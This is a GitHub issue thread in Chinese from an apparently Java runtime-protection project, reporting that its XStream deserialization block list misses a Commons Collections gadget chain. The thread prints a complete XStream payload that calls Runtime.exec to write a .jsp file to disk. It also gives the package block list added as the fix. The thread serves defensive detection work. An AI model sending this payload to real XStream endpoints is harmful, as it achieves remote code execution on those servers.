[bug] xml_black_package_list xstream 反序列化没有阻断，缺少配置。 #33

yupd · 2023-09-27T03:15:08Z

<map>
  <entry>
    <org.apache.commons.collections.keyvalue.TiedMapEntry>
      <map class="org.apache.commons.collections.map.LazyMap" serialization="custom">
        <unserializable-parents/>
        <org.apache.commons.collections.map.LazyMap>
          <default>
            <factory class="org.apache.commons.collections.functors.ChainedTransformer">
              <iTransformers>
                <org.apache.commons.collections.functors.ConstantTransformer>
                  <iConstant class="java-class">java.lang.Runtime</iConstant>
                </org.apache.commons.collections.functors.ConstantTransformer>
                <org.apache.commons.collections.functors.InvokerTransformer>
                  <iMethodName>getMethod</iMethodName>
                  <iParamTypes>
                    <java-class>java.lang.String</java-class>
                    <java-class>[Ljava.lang.Class;</java-class>
                  </iParamTypes>
                  <iArgs>
                    <string>getRuntime</string>
                    <java-class-array/>
                  </iArgs>
                </org.apache.commons.collections.functors.InvokerTransformer>
                <org.apache.commons.collections.functors.InvokerTransformer>
                  <iMethodName>invoke</iMethodName>
                  <iParamTypes>
                    <java-class>java.lang.Object</java-class>
                    <java-class>[Ljava.lang.Object;</java-class>
                  </iParamTypes>
                  <iArgs>
                    <null/>
                    <object-array/>
                  </iArgs>
                </org.apache.commons.collections.functors.InvokerTransformer>
                <org.apache.commons.collections.functors.InvokerTransformer>
                  <iMethodName>exec</iMethodName>
                  <iParamTypes>
                    <java-class>[Ljava.lang.String;</java-class>
                  </iParamTypes>
                  <iArgs>
                    <string-array>
                      <string>cmd</string>
                      <string>/c</string>
                      <string>echo &quot;hello&quot; &gt; &quot;d:\hello.jsp&quot;</string>
                    </string-array>
                  </iArgs>
                </org.apache.commons.collections.functors.InvokerTransformer>
                <org.apache.commons.collections.functors.ConstantTransformer>
                  <iConstant class="int">1</iConstant>
                </org.apache.commons.collections.functors.ConstantTransformer>
              </iTransformers>
            </factory>
          </default>
          <map/>
        </org.apache.commons.collections.map.LazyMap>
      </map>
      <key class="string">keykey</key>
    </org.apache.commons.collections.keyvalue.TiedMapEntry>
    <string>valuevalue</string>
  </entry>
</map>

xl1605368195 · 2023-09-27T11:35:58Z

这个是漏报吗？看下是否命中黑名单 @yupd

yupd · 2023-09-28T07:26:54Z

这个是漏报吗？看下是否命中黑名单 @yupd

config.json 配置 rce-algorithm 算法 rce_action : 0 不阻断，如果开启 xml_black_list_action: 1 这个 xml 是不会被阻断的。

我改了下配置添加两个检测的包就好了。

"xml_black_package_list": [
          "org.apache.commons.collections.functors",
          "org.apache.commons.collections4.functors",
        。。。省略 。。。
]

xl1605368195 · 2023-10-01T02:28:19Z

好的，已经增加。
5a01164

jvm-rasp added the bug Something isn't working label Sep 27, 2023

xl1605368195 added 误报漏报规则不准确导致的误报、漏报 and removed bug Something isn't working labels Oct 1, 2023

xl1605368195 closed this as completed Oct 1, 2023

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[bug] xml_black_package_list xstream 反序列化没有阻断，缺少配置。 #33

[bug] xml_black_package_list xstream 反序列化没有阻断，缺少配置。 #33

yupd commented Sep 27, 2023

xl1605368195 commented Sep 27, 2023

yupd commented Sep 28, 2023

xl1605368195 commented Oct 1, 2023

[bug] xml_black_package_list xstream 反序列化没有阻断，缺少配置。 #33

[bug] xml_black_package_list xstream 反序列化没有阻断，缺少配置。 #33

Comments

yupd commented Sep 27, 2023

xl1605368195 commented Sep 27, 2023

yupd commented Sep 28, 2023

xl1605368195 commented Oct 1, 2023